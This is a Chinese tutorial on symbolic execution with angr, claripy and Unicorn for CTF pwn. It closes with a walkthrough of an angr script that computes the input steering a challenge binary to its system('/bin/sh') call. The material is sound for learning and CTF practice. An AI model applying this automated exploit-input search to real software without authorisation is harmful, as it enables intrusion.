[原创]符号执行在自动化Pwn中的简单利用-Pwn-看雪-安全社区|安全招聘|kanxue.com

五、高级篇 - 5.3 符号执行 - 《CTF 竞赛入门指南(CTF All In One)》 - 书栈网 · BookStack

jakespringer/angr_ctf (github.com)

关于Faster的那些事… (myts2.cn)

符号执行 (Symbolic Execution) 与约束求解 (Constraint Solving) - 知乎 (zhihu.com)

Z3求解器基础学习 (一) 从例子入门 - 说芬兰语的雪 - 博客园 (cnblogs.com)

Unicorn Engine - CTF Wiki (ctf-wiki.org)

这两个东西应该逆向中会用的比较多,不过也不排除出现在pwn中(自动化pwn),而且也可以使用在自动化漏洞挖掘中,先简单学习一下常用的几个工具

符号执行

什么是符号执行?

简单来说就是将输入符号化,然后找到所有程序可能的执行路径与这些符号的关系

angr

angr 是一个多架构的二进制分析平台,具备对二进制文件的动态符号执行能力和多种静态分析能力。

官方文档angr documentation

Project

使用angr 的第一步是新建一个工程,几乎所有的操作都是围绕这个工程展开的:

1
2
import angr
p = angr.Project('./pwn')

载入二进制文件后,我们就可以访问一些基本属性,如文件名、架构、入口地址:

1
2
3
>>> proj.arch
>>> proj.entry
>>> proj.filename

angr 中的 CLE 模块用于将二进制文件载入虚拟地址空间,而CLE 最主要的接口就是 loader 类。

可以通过 Project 的 .loader的属性查看

1
2
>>> p.loader
<Loaded pwn, maps [0x400000:0xa07fff]>

通过 loader, 我们可以获得二进制文件的共享库、地址空间等信息。

1
2
>>> p.loader.shared_objects
OrderedDict([('pwn', <ELF Object pwn, maps [0x400000:0x40a65f]>), ('libc.so.6', <ELF Object libc-2.31.so, maps [0x500000:0x6f165f]>), ('ld-linux-x86-64.so.2', <ELF Object ld-2.31.so, maps [0x700000:0x72f18f]>), ('extern-address space', <ExternObject Object cle##externs, maps [0x800000:0x87ffff]>), ('cle##tls', <ELFTLSObjectV2 Object cle##tls, maps [0x900000:0x91500f]>)])

但通常我们在创建工程时选择关闭 auto_load_libs 以避免 angr 加载共享库:

1
>>> p = angr.Project('/bin/true', auto_load_libs=False)

模拟执行

project.factory 提供了很多类对二进制文件进行分析,它提供了几个方便的构造函数。

project.factory.block() 用于从给定地址解析一个 basic block,对象类型为 Block,基本块是angr模拟执行的最小单位,一个基本块以遇到更改ip指令(比如说jmp,jz,jnz,call等等)为止

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
>>> block = proj.factory.block(proj.entry)    # 从程序头开始解析一个 basic block
>>> block
<Block for 0x401370, 42 bytes>
>>> block.pp() # pretty-print of disassemble code of the block
0x401370: xor ebp, ebp
0x401372: mov r9, rdx
0x401375: pop rsi
0x401376: mov rdx, rsp
0x401379: and rsp, 0xfffffffffffffff0
0x40137d: push rax
0x40137e: push rsp
0x40137f: lea r8, qword ptr [rip + 0x32da]
0x401386: lea rcx, qword ptr [rip + 0x3263]
0x40138d: lea rdi, qword ptr [rip - 0xe4]
0x401394: call qword ptr [rip + 0x205b76]
>>> block.instructions # 指令数量
11
>>> block.instruction_addrs # 指令地址
[4199280L, 4199282L, 4199285L, 4199286L, 4199289L, 4199293L, 4199294L, 4199295L, 4199302L, 4199309L, 4199316L]

另外,还可以将 Block 对象转换成其他形式:

1
>>> block.capstone<CapstoneBlock for 0x401370>>>> block.capstone.pp()>>> block.vexIRSB <0x2a bytes, 11 ins., <Arch AMD64 (LE)>> at 0x401370>>> block.vex.pp()

SimState

angr 使用 SimState 类表示一个 模拟的程序状态 (simulated program state),我们的各种操作实际上是由一个 state 步进到另一个 state 的过程

我们使用 project.factory.entry_state() 获取一个程序的初始执行状态,使用 project.factory.blank_state(addr) 获取一个程序从指定地址开始执行的空白状态:

1
2
>>> state = proj.factory.entry_state()
>>> state = proj.factory.blank_state(0xdeadbeef)

该对象包含了程序的内存、寄存器、文件系统数据等等模拟运行时动态变化的数据,例如:

  • state.regs:寄存器状态组,其中每个寄存器都为一个 位向量 (BitVector),我们可以通过寄存器名称来访问对应的寄存器(例如 state.regs.esp -= 12 )。
  • state.mem:该状态的内存访问接口,我们可以直接通过 state.mem[addr].type 完成内存访问(例如 state.mem[0x1000].long = 4 ,对于读而言还需指定 .resolved.concrete 表示位向量或是实际值,例如 state.mem[0x1000].long.concrete)。
  • state.memory:另一种形式的内存访问接口:
  • state.memory.load(addr, size_in_bytes) :获取该地址上指定大小的位向量。
  • state.memory.store(addr, bitvector) :将一个位向量存储到指定地址。
  • state.posix:POSIX 相关的环境接口,例如 state.posix.dumps(fileno) 获取对应文件描述符上的流。

sigmr

SIMULATION_MANAGER - 模拟执行器

angr 将一个状态的执行方法独立成一个 SimulationManager 类,以下两种写法等效:

1
2
3
4
>>> proj.factory.simgr(state)
<SimulationManager with 1 active>
>>> proj.factory.simulation_manager(state)
<SimulationManager with 1 active>

比较重要的两个条件:

  • simgr.step()以基本块为单位的单步执行。
  • simgr.explore():进行路径探索找到满足相应条件的状态。

simgr.explore() 的默认参数是 find,即期望条件,当模拟执行器在路径探索的过程中发现当前状态满足该条件时,该状态会被放到 simgr.found 列表中,若无法找到则该列表为空。

期望条件通常可以是执行到某个地址:

1
2
3
4
5
6
7
8
9
>>> simgr.explore(find=0x80492F0) # explore to a specific address
WARNING | 2023-07-17 04:04:28,825 | angr.storage.memory_mixins.default_filler_mixin | The program is accessing memory with an unspecified value. This could indicate unwanted behavior.
WARNING | 2023-07-17 04:04:28,825 | angr.storage.memory_mixins.default_filler_mixin | angr will cope with this by generating an unconstrained symbolic variable and continuing. You can resolve this by:
WARNING | 2023-07-17 04:04:28,826 | angr.storage.memory_mixins.default_filler_mixin | 1) setting a value to the initial state
WARNING | 2023-07-17 04:04:28,826 | angr.storage.memory_mixins.default_filler_mixin | 2) adding the state option ZERO_FILL_UNCONSTRAINED_{MEMORY,REGISTERS}, to make unknown regions hold null
WARNING | 2023-07-17 04:04:28,826 | angr.storage.memory_mixins.default_filler_mixin | 3) adding the state option SYMBOL_FILL_UNCONSTRAINED_{MEMORY,REGISTERS}, to suppress these messages.
WARNING | 2023-07-17 04:04:28,826 | angr.storage.memory_mixins.default_filler_mixin | Filling memory at 0x7ffeff60 with 4 unconstrained bytes referenced from 0x819af30 (strcmp+0x0 in libc.so.6 (0x9af30))
WARNING | 2023-07-17 04:04:28,826 | angr.storage.memory_mixins.default_filler_mixin | Filling memory at 0x7ffeff70 with 12 unconstrained bytes referenced from 0x819af30 (strcmp+0x0 in libc.so.6 (0x9af30))
<SimulationManager with 1 active, 16 deadended, 1 found>

期望条件也可以是自定义的以 状态 为参数的布尔函数。例如,若是我们想要寻找一条输出指定字符串的路径,可以选择通过判断该字符串是否在输出中的方式,我们可以通过 state.posix.dumps(文件描述符) 来获取对应文件描述符上的字符流:

1
2
3
4
5
>>> def foo(state):
... return b"Good" in state.posix.dumps(1)
...
>>> simgr.explore(find=foo)
<SimulationManager with 17 deadended, 1 found>

除了 find 参数外,我们也可以指定 avoid 参数——模拟器运行中应当要避开的条件,当一个状态符合这样的条件时,其会被放在 .avoided 列表中并不再往后执行。类似地,avoid 参数可以是某个地址,也可以是自定义的布尔函数。

此外,我们还可以通过指定 num_find 参数来指定需要寻找的符合条件的状态的数量,若未指定则会在 .found 列表中存储所有的符合条件的状态。

explore

explore是在ctf中使用的比较多的共能

通过调用 explore 方法,我们可以探索执行路径,在进行 explore 时,可以设置 find 和 avoid 参数,以便找到符合我们预期的路径。

函数接口如下:

1
2
def explore(self, stash='active', n=None, find=None, avoid=None, find_stash='found', avoid_stash='avoid', cfg=None,
num_find=1, **kwargs):

例子

1
2
3
4
5
6
7
8
9
10
11
12
import angr
from binascii import b2a_hex

def angr_run():
proj = angr.Project('./bin5')
state = proj.factory.entry_state()
simgr = proj.factory.simgr(state)
simgr.explore(find=0x08048783)
payload = simgr.found[0].posix.dumps(0)
print(f'payload={b2a_hex(payload)}')

angr_run()

angr 提供了多种 explore 技术,即进行路径探索时所采用的策略,可以在 angr.exploration_techniques 条目下中找到。

每个策略都是 ExplorationTechnique 对象,根据策略不同,angr 对 ExplorationTechnique 中的 setup、step 等方法进行覆盖。

通过 simgr.use_technique(tech)设定不同的策略。

下面部分列出策略

名称 描述
DFS Depth first search. Keeps only one state active at once, putting the rest in the deferred stash until it deadends or errors.
LengthLimiter Puts a cap on the maximum length of the path a state goes through.
Tracer An exploration technique that causes execution to follow a dynamic trace recorded from some other source.
Oppologist if this technique is enabled and angr encounters an unsupported instruction, it will concretize all the inputs to that instruction and emulate the single instruction using the unicorn engine, allowing execution to continue.
Threading Adds thread-level parallelism to the stepping process.
Spiller When there are too many states active, this technique can dump some of them to disk in order to keep memory consumption low.

如果要让angr跑程序的话,有两点会提高效率,一种是hook代码,一种是设定avoid条件。hook代码即人工把某部分汇编代码翻译成python之后告诉angr,当你执行到这里的时候它其实是这个意思,就不用让他再跑VEX了。路径爆炸是符号执行一定要解决的问题,所以说可以提前帮助angr做剪枝,使得它不会再其他不可能进行下去的分支上耽误太长时间。

getav的思路: 其实还是找规律,一般来说,基本都是不符合条件就直接跳下去,不再继续执行函数,所以说这就是明显的特征之一,找到跳下去的部分,用vex.next看如果不跳下去会到什么地址,然后直接把另一条路拉到avoid里就OK了,这是第一个特征。

Function hook

有的时候我们会有需要 hook 掉某个函数的需求,此时我们可以使用 project.hook(addr = call_insn_addr, hook = my_function, length = n) 来 hook 掉对应的 call 指令:

  • call_insn_addr:被 hook 的 call 指令的地址
  • my_function :我们的自定义 python 函数
  • length: call 指令的长度

我们的自定义函数应当为接收 state 作为参数的函数,angr 还提供了 decorator 语法糖,因此以下两种写法都可以:

1
2
3
4
5
6
7
8
9
10
11
# method 1
@project.hook(0x1234, length=5)
def my_hook_func(state):
# do something, this is an example
state.regs.eax = 0xdeadbeef

# method 2
def my_hook_func2(state):
# do something, this is an example
state.regs.eax = 0xdeadbeef
proj.hook(addr = 0x5678, hook = my_hook_func2, length = 5)

Simulated Procedure

在 angr 中 angr.SimProcedure 类用来表示在一个状态上的一个运行过程——即函数实际上是一个 SimPrecedure。

我们可以通过创建一个继承自 angr.SimProcedure 的类并重写 run() 方法的方式来表示一个自定义函数,其中 run() 方法的参数为该函数所接收的参数:

1
2
3
4
class MyProcedure(angr.SimProcedure):
def run(self, arg1, arg2):
# do something, this's an example
return self.state.memory.load(arg1, arg2)

自定义函数过程主要用于对文件中的原有函数进行替换,例如 angr 缺省会用内置的一些 SimProcedure 来替换掉一些库函数。

若我们已经有该二进制文件的符号表,我们可以直接使用 project.hook_symbol(symbol_str, sim_procedure_instance) 来自动 hook 掉文件中所有的对应符号,其中 run() 方法的参数为被替换函数所接收的参数,示例如下:

1
2
3
4
5
6
7
8
9
10
import angr
import claripy

class MyProcedure(angr.SimProcedure):
def run(self, arg1, arg2):
# do something, this's an example
return self.state.memory.load(arg1, arg2)

proj = angr.Project('./test')
proj.hook_symbol('func_to_hook', MyProcedure())

当然,在 SimProcedure 的 run() 过程中我们也可以使用一些有用的成员函数:

  • ret(expr): 函数返回。
  • jump(addr): 跳转到指定地址。
  • exit(code): 终止程序。
  • call(addr, args, continue_at): 调用文件中的函数。
  • inline_call(procedure, *args): 内联地调用另一个 SimProcedure。

stash

在 angr 当中,不同的状态被组织到 simulation manager 的不同的 stash 当中,我们可以按照自己的需求进行步进、过滤、合并、移动等。

在 angr 当中一共有以下几种 stash:

  • simgr.active:活跃的状态列表。在未指定替代的情况下会被模拟器默认执行
  • simgr.deadended:死亡的状态列表。当一个状态无法再被继续执行时(例如没有有效指令、无效的指令指针、不满足其所有的后继(successors))便会被归入该列表
  • simgr.pruned:被剪枝的状态列表。在指定了 LAZY_SOLVES 时,状态仅在必要时检查可满足性,当一个状态在指定了 LAZY_SOLVES 时被发现是不可满足的(unsat),状态层(state hierarchy)将会被遍历以确认在其历史中最初变为不满足的时间,该点及其所有后代都会被 剪枝 (pruned)并放入该列表
  • simgr.unconstrained:不受约束的状态列表。当创建 SimulationManager 时指定了 save_unconstrained=True,则被认为不受约束的(unconstrained,即指令指针被用户数据或其他来源的符号化数据控制)状态会被归入该列表
  • simgr.unsat:不可满足的状态列表。当创建 SimulationManager 时指定了 save_unsat=True,则被认为无法被满足的(unsatisfiable,即存在约束冲突的状态,例如在同一时刻要求输入既是"AAAA" 又是 "BBBB")状态会被归入该列表

还有一种不是 stash 的状态列表——errored,若在执行中产生了错误,则状态与其产生的错误会被包裹在一个 ErrorRecord 实例中(可通过 record.staterecord.error 访问),该 record 会被插入到 errored 中,我们可以通过 record.debug() 启动一个调试窗口

stash操作

我们可以使用 stash.move() 来在 stash 之间转移放置状态,用法如下:

1
>>> simgr.move(from_stash = 'unconstrained', to_stash = 'active')

在转移当中我们还可以通过指定 filter_func 参数来进行过滤:

1
2
3
4
>>> def filter_func(state):
... return b'arttnba3' in state.posix.dumps(1)
...
>>> simgr.move(from_stash = 'unconstrained', to_stash = 'active', filter_func = filter_func)

stash 本质上就是个 list,因此在初始化时我们可以通过字典的方式指定每个 stash 的初始内容:

1
2
3
4
5
>>> simgr = proj.factory.simgr(init_state,
... stashes = {
... 'active':[init_state],
... 'found':[],
... })

unconstrained

当一个指令有很多分支的可能性时,称之为不受约束(unconstrained)的状态, 比如说当用户的输入决定下一条指令的位置。

angr 在遇到不受约束的状态时会将其抛出,在处理溢出时我们可以选择关闭这个默认行为,以此求解payload

Claripy

Claripy 是 angr 的求解引擎(solver engine),其内部会无缝混合使用几种后端(concrete bitvectors、SAT solvers 等),对于我们而言一般不需要直接与其进行交互,但通常我们会使用其提供的一些接口

bitvector - 位向量

位向量(bitvector)是 angr 求解引擎中的一个重要部分,其表示了 一串比特位 (a sequence of bits)。

我们可以通过 claripy.BVV(int_value, size_in_bits)claripy.BVV(string_value) 创建带有具体值(concrete value)的指定长度的位向量值(bitvector value):

1
2
3
4
5
6
>>> bvv = claripy.BVV(b'flagflag')
>>> bvv
<BV64 0x666C6167666C6167>
>>> bvv2 = claripy.BVV(0xdeadbeef, 32)
>>> bvv2
<BV32 0xdeadbeef>

下面是 Python int 和 bitvectors 之间的转换:

1
2
3
4
5
6
7
8
9
10
>>> bv = state.solver.BVV(0x1234, 32)   # 创建值 0x1234 的 BV32 对象
>>> bv
<BV32 0x1234>
>>> hex(state.solver.eval(bv),cast_to=bytes) # 将 BV32 对象转换为 Python int
'0x1234'
>>> bv = state.solver.BVV(0x1234, 64)
>>> bv
<BV64 0x1234>
>>> hex(state.solver.eval(bv))
'0x1234L'

相同长度的位向量可以进行运算,对于不同长度的位向量则可以通过 .zero_extend(extended_bits) 完成位扩展(0 填充)后进行运算,需要注意的是位向量的值运算同样存在溢出

1
2
3
4
5
>>> bvv2 = bvv2.zero_extend(32)
>>> bvv + bvv2
<BV64 0x617274754d102022>
>>> bvv * bvv
<BV64 0x9842ff8e63f3b029>

位向量除了代表具体值(concrete value)的 bitvector value 以外,还有代表符号变量(symbolic variable)的 bitvector symbol,我们可以通过 claripy.BVS(name, size_in_bits) 创建带名字的指定长度的位向量符号(bitvector symbol):

1
2
3
4
5
6
>>> bvs = claripy.BVS("x", 64)
>>> bvs
<BV64 x_0_64>
>>> bvs2 = claripy.BVS("y", 64)
>>> bvs2
<BV64 y_1_64>

位向量符号与位向量值之间同意可以进行运算,组合成更加复杂的表达式:

1
2
3
>>> bvs3 = (bvs * bvs2 + bvv) / bvs
>>> bvs3
<BV64 (x_0_64 * y_1_64 + 0x617274746e626133) / x_0_64>

我们可以通过 .op.args 获得位向量的运算类型与参数:

1
2
3
4
5
6
7
8
9
10
>>> bvv.op
'BVV'
>>> bvs.op
'BVS'
>>> bvs3.op
'__floordiv__'
>>> bvs3.args
(<BV64 x_0_64 * y_1_64 + 0x617274746e626133>, <BV64 x_0_64>)
>>> bvv.args
(7021802812440994099, 64)

使用 bitvectors 可以直接来设置寄存器和内存的值,当传入的是 Python int 时,angr 会自动将其转换成 bitvectors:

1
2
3
4
5
6
7
8
>>> state.regs.rsi = state.solver.BVV(3, 64)
>>> state.regs.rsi
<BV64 0x3>
>>> state.mem[0x1000].long = 4 # 在地址 0x1000 存放一个 long 类型的值 4
>>> state.mem[0x1000].long.resolved # .resolved 获取 bitvectors
<BV64 0x4>
>>> state.mem[0x1000].long.concrete # .concrete 获得 Python int
4L

程序分析

angr 提供了大量函数用于程序分析,在这些函数在 Project.analyses.,例如:

1
2
3
4
5
6
7
8
9
10
11
12
>>> cfg = p.analyses.CFGFast()          # 得到 control-flow graph
>>> cfg
<CFGFast Analysis Result at 0x7f1265b62650>
>>> cfg.graph
<networkx.classes.digraph.DiGraph object at 0x7f1265e77310> # 详情请查看 networkx
>>> len(cfg.graph.nodes())
934
>>> entry_node = cfg.get_any_node(proj.entry) # 得到给定地址的 CFGNode
>>> entry_node
<CFGNode 0x401370[42]>
>>> len(list(cfg.graph.successors(entry_node)))
2

如果要想画出图来,还需要安装 matplotlib。

1
2
3
4
5
6
>>> import networkx as nx
>>> import matplotlib
>>> matplotlib.use('Agg')
>>> import matplotlib.pyplot as plt
>>> nx.draw(cfg.graph) # 画图
>>> plt.savefig('temp.png') # 保存

模拟文件

在 angr 当中与文件系统间的操作是通过 SimFile 对象完成的,SimFile 为对 存储 的抽象模型,一个 SimFile 对象可以表示一系列的字节、符号等。

我们可以通过 angr.SimFile() 来创建一个模拟文件,创建带有具体值与符号变量的 SimFile 例子如下:

1
2
3
4
>>> import angr, claripy
>>> sim_file = angr.SimFile('a_file', content = "flag{F4k3_f1@9!}\n")
>>> bvs = claripy.BVS('bvs', 64)
>>> sim_file2 = angr.SimFile('another_file', bvs, size=8) # size in bytes there

模拟文件需要与特定的状态进行关联,通过 state.fs.insert(sim_file)sim_file.set_state(state) 我们可以将 SimFile 插入到一个状态的文件系统中:

1
>>> state.fs.insert('test_file', sim_file)

我们还可以从文件中读取内容:

1
2
>>> pos = 0
>>> data, actural_read, pos = sim_file.read(pos, 0x100)

对于 (Streams,例如标准 IO、TCP 连接等)类型的文件,我们可以用 angr.SimPackets() 来创建:

1
2
3
>>> sim_packet = angr.SimPackets('my_packet')
>>> sim_packet
<angr.storage.file.SimPackets object at 0x7f75626a2e80>

CFG

CFG 是一个表示程序中基本块之间控制流关系的图形结构,它可以帮助分析程序的结构和逻辑。

angr有两种分析获取cfg的方法

CFGFast 分析器通过静态分析程序的二进制代码来构建控制流图,而不需要实际执行程序。因此,它是一种快速获取程序结构信息的方法。

CFGEmulated通过动态符号执行获得更加准确的CFG。

但是可以看到在很多时候使用cfg = proj.analyses.CFGFast(normalize=True, force_complete_scan=False)获得CFG后还会将其转化为supergraph

为什么要这样?因为angr生成的CFG与ida的CFG并不相同

  1. angr基本上只要遇到会修改pc计数器的指令都会将其视作一个基本块的结束,而ida并不会将可返回函数的调用(call)作为基本块的结束
  2. angr的cfg以整个程序为单位(当然也可以转化为函数的进行操作),而ida以函数为单位

而转化为supergraph之后的cfg形式就与ida的cfg更为相似,那为什么要转为ida形式的?就是为了避免某些功能函数(例如标准输入)被算到一个基本块,从而导致一些奇奇怪怪的问题

unicorn

unicorn与angr类似,不过也有一些区别

  • Unicorn:Unicorn 是一个模拟器,它可以模拟多种 CPU 架构的指令执行。它提供了一种运行二进制代码的方式,使得用户可以在不真正运行二进制程序的情况下观察其行为。
  • Angr:Angr 是一个符号执行框架,它使用符号执行技术来对二进制程序进行分析。Angr 能够在程序的输入空间中搜索,以找到满足特定条件的输入,以此来探索程序的执行路径和可能的漏洞。

快速入门

unicorn/bindings/python/sample_x86.py at master · unicorn-engine/unicorn (github.com)官方给的例子,不过有点长,用wiki中例子做示范

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
from __future__ import print_function
from unicorn import *
from unicorn.x86_const import *

# code to be emulated
X86_CODE32 = b"\x41\x4a" # INC ecx; DEC edx

# memory address where emulation starts
ADDRESS = 0x1000000

print("Emulate i386 code")
try:
# Initialize emulator in X86-32bit mode
mu = Uc(UC_ARCH_X86, UC_MODE_32)

# map 2MB memory for this emulation
mu.mem_map(ADDRESS, 2 * 1024 * 1024)

# write machine code to be emulated to memory
mu.mem_write(ADDRESS, X86_CODE32)

# initialize machine registers
mu.reg_write(UC_X86_REG_ECX, 0x1234)
mu.reg_write(UC_X86_REG_EDX, 0x7890)

# emulate code in infinite time & unlimited instructions
mu.emu_start(ADDRESS, ADDRESS + len(X86_CODE32))

# now print out some registers
print("Emulation done. Below is the CPU context")

r_ecx = mu.reg_read(UC_X86_REG_ECX)
r_edx = mu.reg_read(UC_X86_REG_EDX)
print(">>> ECX = 0x%x" %r_ecx)
print(">>> EDX = 0x%x" %r_edx)

except UcError as e:
print("ERROR: %s" % e)

这个已经非常直接明白了

例题

2021纵横杯决赛-bin1

程序是一坨的条件判断,存在一条正确的路径可以在最后拿到shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
int sub_80485F5()
{
if ( sub_8054B1A() != 1 )
{
if ( sub_8054B1A() == 1 )
{
if ( sub_8054B1A() == 1 )
{
if ( sub_8054B1A() == 1 )
{
if ( sub_8054B1A() == 1 )
{
if ( sub_8054B1A() == 1 )
{
if ( sub_8054B1A() == 1 )
{
if ( sub_8054B1A() == 1 )
{
if ( sub_8054B1A() == 1 )
{
if ( sub_8054B1A() == 1 )
{
if ( sub_8054B1A() == 1 )
exit(0);
exit(0);
}
if ( sub_8054B1A() == 1 )
exit(0);
exit(0);
}
if ( sub_8054B1A() == 1 )
{
if ( sub_8054B1A() == 1 )
exit(0);
exit(0);
}
if ( sub_8054B1A() == 1 )
exit(0);
.....
.....
....
....
}
if ( sub_8054B1A() != 1 )
exit(0);
return system("/bin/sh");
}

这题是无法直接使用

用符号执行解决这种分支问题有两个思路:

  1. 找到所有从函数入口到system函数的路径,对每条路径进行操作,在每两个基本块之间进行explore
  2. 找到所有从函数入口到system函数的路径,将其他不在路径上的基本块地址添加到avoid_list中,再从函数入口开始explore

这里计算avoid_list的原因是此题的分支数巨大,每一个分支条件语句都可能会使当前的路径再分支出一条新的路径,而且这是”指数级”增长的,也就是说符号执行所需要的时间和空间都会随分支数的增长而”指数级”增长,这显然是我们不愿看到的。
所以我们需要计算avoid_list,使符号执行引擎忽略某些根本不可能到达system函数的路径,这样在一定程度上避免了上述问题。

先看一下最终的exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
import angr
import am_graph#我没有装angr-managment,但我找到了这个
from binascii import b2a_hex


#获取system函数的地址

def get_system_addr(cfg):
for func_addr in cfg.functions:
func = cfg.functions.get(func_addr)
if func.name == 'system':
return func_addr
return None


#获取避免执行到的地址列表
#关键!可以大大提高angr符号执行速度

def get_avoid_list(cfg, start, target):
if start.addr == target:
return (True, [])
succs = list(cfg.successors(start))
if len(succs) == 0:
return (False, [start.addr])
elif len(succs) == 1:
can_reach_target, avoid_list = get_avoid_list(cfg, succs[0], target)
if can_reach_target:
return (True, avoid_list)
else:
avoid_list.append(start.addr)
return (False, avoid_list)
elif len(succs) == 2:
can_reach_target0, avoid_list0 = get_avoid_list(cfg, succs[0], target)
can_reach_target1, avoid_list1 = get_avoid_list(cfg, succs[1], target)
if can_reach_target0 and can_reach_target1:
return (True, [])
elif not can_reach_target0 and not can_reach_target1:
avoid_list = avoid_list0 + avoid_list1
avoid_list.append(start.addr)
return (False, avoid_list)
else:
avoid_list = avoid_list0 + avoid_list1
return (True, avoid_list)
else:
exit(0)

#对目标函数进行符号执行,求解到达call system执行所需要的输入

def explore_func(proj, target_func, target_block, target_cfg):
can_reach_target, avoid_list = get_avoid_list(target_cfg, list(target_cfg.nodes)[0], target_block)
print(avoid_list)
if can_reach_target:
state = proj.factory.call_state(target_func)#设置初始状态
simgr = proj.factory.simgr(state)
simgr.use_technique(angr.exploration_techniques.DFS())
simgr.explore(find=target_block, avoid=avoid_list)
payload_list = []
for found in simgr.found:
payload_list.append(found.posix.dumps(0))
return payload_list


#求解所有可行的payload

def explore_payload(bin_path):
proj = angr.Project(bin_path, load_options={'auto_load_libs': False})
proj_cfg = proj.analyses.CFGFast()
system_addr = get_system_addr(proj_cfg)
if system_addr == None:
return []
print(f'Found system function in {hex(system_addr)}.')
payload_list = []
for func_addr in proj_cfg.functions:
try:
func = proj_cfg.functions.get(func_addr)
cfg = func.transition_graph
cfg = am_graph.to_supergraph(cfg)

for node in cfg.nodes:
block = proj.factory.block(node.addr)
for inst in block.capstone.insns:
if inst.mnemonic == 'call' and inst.op_str == "{:x}h".format(system_addr):
target_func = func_addr
target_block = block.addr
target_cfg = cfg
print(f'Found target function in {hex(target_func)}')
print(f'Found target block in {hex(target_block)}')
payload_list += explore_func(proj, target_func, target_block, target_cfg)
except Exception as ex:
print(ex)
return payload_list

def angr_run():
payload_list = explore_payload('./bin1')
print(payload_list)
for payload in payload_list:
print('payload=' + b2a_hex(payload).decode())

angr_run()

嘿嘿,完全看不懂捏,一步一步分析一下

在创建完项目之后,有一句

1
proj_cfg = proj.analyses.CFGFast()

用于进行快速构建控制流图(CFG)的一个分析器。

因为是自动化pwn,所以选择通过分析获得system的地址

原作者是这样做的

1
2
3
4
5
6
def get_system_addr(cfg):
for func_addr in cfg.functions:
func = cfg.functions.get(func_addr)
if func.name == 'system':
return func_addr
return None

但实际上可以更简单的

1
2
3
4
5
6
def get_system_addr(cfg,func_name):
func = cfg.functions.get(func_name)
return func.addr

>>> get_system_addr(proj_cfg,'system')
134513728

甚至

1
system_addr = p.loader.find_symbol('system').rebased_addr

再然后又初始化了一个列表payload_list = []

然后遍历每个函数并返回一个cfg-graph,又遍历每一个cfg-graph的nodes

1
2
3
func = proj_cfg.functions.get(func_addr)
cfg = func.transition_graph
cfg = am_graph.to_supergraph(cfg)

注意:在获得一个函数的cfg后,又将其转化为了supergraph,这一步是不可或缺的,但少了这一步也能正常执行但就是没有返回结果,因为一般cfg在call处也会停止一个基本块,所以输入函数sub_8054B1A也被加入到基本块avoid_list推算,那么sub_8054B1A是肯定无法到达system的,所以非常逆天的就是sub_8054B1A也被加入到avoid_list了,那这样肯定是没有标准输入的…..

一个node通常表示程序中的一个执行点或者一个特定的结构。在控制流图(CFG)中,节点表示程序中的不同位置或者不同的结构单元.可以是以下几种类型之一:

  1. 基本块节点(Block Node):表示程序中的一个连续的指令序列,通常是在程序中的一个基本块(basic block)内。基本块是一组连续执行的指令,没有条件分支,只有一个入口和一个出口。
  2. 函数节点(Function Node):表示程序中的一个函数,其中包含了函数的入口点和出口点,以及函数内部的基本块。
  3. 钩子节点(Hook Node):表示程序中的一个函数调用的目标,通常是一个库函数或者系统函数。
  4. 其他类型的节点:根据具体的分析需求和程序结构,控制流图中可能还包含其他类型的节点,如跳转表节点、异常处理节点等

取每一个node作为一个block,然后去判断block中是否存在对system的调用

当找到后进入一次explore_func(在本例中只有一处调用了system,也就是函数sub_80485f5,所以循环实际上会且仅会执行一次explore_func)

explore_func首先进行getav即找到需要避免

仔细看一下这个getav函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
def get_avoid_list(cfg, start, target):
if start.addr == target:
return (True, [])
succs = list(cfg.successors(start))
if len(succs) == 0:
return (False, [start.addr])
elif len(succs) == 1:
can_reach_target, avoid_list = get_avoid_list(cfg, succs[0], target)
if can_reach_target:
return (True, avoid_list)
else:
avoid_list.append(start.addr)
return (False, avoid_list)
elif len(succs) == 2:
can_reach_target0, avoid_list0 = get_avoid_list(cfg, succs[0], target)
can_reach_target1, avoid_list1 = get_avoid_list(cfg, succs[1], target)
if can_reach_target0 and can_reach_target1:
return (True, [])
elif not can_reach_target0 and not can_reach_target1:
avoid_list = avoid_list0 + avoid_list1
avoid_list.append(start.addr)
return (False, avoid_list)
else:
avoid_list = avoid_list0 + avoid_list1
return (True, avoid_list)
else:
exit(0)
  1. 如果函数开始的第一个节点就是目标节点那么完全不需要什么avoid_list,直接返回可到达,与空avoid
  2. 否则获取后继节点,如果后继节点不存在,那么返回不可到达,并将start.addr作为avoid_list,即这个函数千万别进入
  3. 如果后继节点数量为1,递归调用getav,如果返回值是可到达那么直接返回,如果是不可到达则将该节点地址放入avoid_list并返回
  4. 如果后继节点为2,分别对两个后继节点递归调用getav,如果两个后继节点都能到达则直接返回可到达与空avoid,如果都不可到达则返回不可到达,并添加avoid,否则分开处理

这里为啥后继节点数量不超过2,如果存在switch结构怎么办?完全不用担心,因为switch在汇编上也是jmp实现的,照样会被识别为多个block

这个递归函数很重要,极大节省了时间

视角回到explore_func,此时已经执行完了getav

1
2
3
4
5
6
7
8
state = proj.factory.call_state(target_func)
simgr = proj.factory.simgr(state)
simgr.use_technique(angr.exploration_techniques.DFS())
simgr.explore(find=target_block, avoid=avoid_list)
payload_list = []
for found in simgr.found:
payload_list.append(found.posix.dumps(0))
return payload_list

首先进行了proj.factory.call_state()调用,call_state(target_func) 方法会创建一个初始状态,该状态模拟了执行目标函数 target_func 时的程序状态。这个初始状态包含了函数调用的上下文信息,如函数参数、返回地址等,并且可以被用于后续的符号执行分析。可以用于指定分析特定函数调用时的程序行为

然后就是常见的创建一个manager,以及指定使用DFS(深度优先算法)进行模拟探索

正式调用方法explore(find=target_block, avoid=avoid_list),同时提供之前返回的avoid_list

最终获得所有发现路径中文件描述符为0的数据,即标准输入的数据,并打印出来

angr-ctf

